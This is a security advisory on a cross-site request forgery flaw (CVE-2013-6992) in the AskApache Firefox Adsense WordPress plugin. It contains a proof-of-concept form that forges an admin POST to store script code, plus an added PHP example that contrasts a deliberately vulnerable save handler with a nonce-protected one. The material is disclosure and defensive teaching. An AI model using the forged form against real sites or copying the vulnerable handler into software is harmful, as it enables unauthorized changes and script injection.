High-Tech Bridge Security Advisory HTB23188

Cross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin

Published: 2013-12-05
Source: High-Tech Bridge, www.htbridge.com

CVSS2: 6.8 Medium (AV:N/AC:M/Au:N/C:P/I:P/A:P)
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL

EPSS: 0.004 Low (percentile 71.3%)

High-Tech Bridge Security Research Lab discovered a vulnerability in the AskApache Firefox Adsense Wordpress plugin which can be exploited to perform Cross-Site Request Forgery (CSRF) attacks.

  1. Cross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin: CVE-2013-6992
    The vulnerability exists because the plugin's settings page, served through the "/wp-admin/options-general.php" script, does not sufficiently verify the origin of the HTTP request that saves its settings (no WordPress nonce or equivalent anti-CSRF token is checked). A remote attacker can trick a logged-in administrator into visiting a specially crafted page containing a CSRF exploit, which submits a forged POST request on the administrator's behalf and stores attacker-controlled HTML and script code in the plugin's "aafireadcode" setting. The injected code is then executed in the administrator's browser in the context of the vulnerable website.
    The exploitation example below injects JavaScript code which uses the "alert()" function to display the word "immuniweb". The form must be submitted while the victim is authenticated to the target site as an administrator; a real attack page would submit it automatically with script rather than waiting for a click on the button:
    <form action="http://[host]/wp-admin/options-general.php?page=askapache-firefox-adsense.php" method="post" name="main">
    <input type="hidden" name="aafireadcode" value='<script>alert("immuniweb");</script>'>
    <input type="submit" id="btn">
    </form>

Affected products (CPE):
  Name: firefox adsense wordpress plugin
  Operator: le (less than or equal)
  Version: 3.0
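The following is an added example, not code from the AskApache plugin or from High-Tech Bridge. It models the bug class this advisory describes in a minimal WordPress options page: a handler that saves the POSTed "aafireadcode" field without proving the request originated from the site's own admin UI, next to a hardened version that checks the user's capability and a WordPress nonce. The function names, option key, page slug and nonce action (aa_example_*, aa-example) are hypothetical; the WordPress API calls (add_options_page, wp_nonce_field, check_admin_referer, current_user_can, update_option) are real.

```php
<?php
/*
 * Added example (hypothetical plugin "aa-example"), not the AskApache code.
 * Shows the missing request-origin check behind HTB23188 and one way to fix it.
 */

// Register the settings page under Settings; only users who may manage
// options can even reach it, but reachability is not the same as intent.
add_action( 'admin_menu', function () {
    add_options_page( 'AA Example', 'AA Example', 'manage_options',
        'aa-example', 'aa_example_page' );
} );

// Vulnerable handler: accepts any POST carrying "aafireadcode" while an
// administrator's session cookie is present. A form on a third-party page,
// like the one in the advisory, satisfies that condition, so the attacker's
// value ends up stored and later printed as the ad snippet.
function aa_example_save_vulnerable() {
    if ( isset( $_POST['aafireadcode'] ) ) {
        update_option( 'aa_example_adcode', wp_unslash( $_POST['aafireadcode'] ) );
    }
}

// Hardened handler: three checks a settings-save path needs.
function aa_example_save_hardened() {
    if ( ! isset( $_POST['aafireadcode'] ) ) {
        return;
    }
    // 1. Authorization: the stored value is raw HTML that will be echoed into
    //    pages, so require the same capability WordPress demands for raw
    //    markup elsewhere, on top of the options capability.
    if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'unfiltered_html' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // 2. Request origin: the nonce is bound to this action and this user and
    //    is only emitted inside the legitimate form. A page on another origin
    //    cannot read it, so a forged POST arrives without a valid token and
    //    check_admin_referer() terminates the request.
    check_admin_referer( 'aa_example_save', 'aa_example_nonce' );
    // 3. Store the value only once both checks passed. Ad code legitimately
    //    contains <script>, so output filtering cannot be the defence here;
    //    proving the administrator intentionally submitted it is.
    update_option( 'aa_example_adcode', wp_unslash( $_POST['aafireadcode'] ) );
}

// Page callback: render the form with the nonce field and handle saves.
function aa_example_page() {
    aa_example_save_hardened();
    ?>
    <div class="wrap">
      <h1>AA Example ad code</h1>
      <form method="post"
            action="<?php echo esc_url( admin_url( 'options-general.php?page=aa-example' ) ); ?>">
        <?php wp_nonce_field( 'aa_example_save', 'aa_example_nonce' ); ?>
        <textarea name="aafireadcode" rows="8" cols="80"><?php
            echo esc_textarea( get_option( 'aa_example_adcode', '' ) ); ?></textarea>
        <?php submit_button( 'Save ad code' ); ?>
      </form>
    </div>
    <?php
}
```

Replaying the advisory's form against the hardened version fails at check_admin_referer() because the attacker's page cannot supply a valid aa_example_nonce value; the nonce is derived from the victim's session and the action name and is never exposed cross-origin. Note that the nonce check alone is not a substitute for the capability check: a nonce proves intent, current_user_can() proves permission, and a settings-save path needs both.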
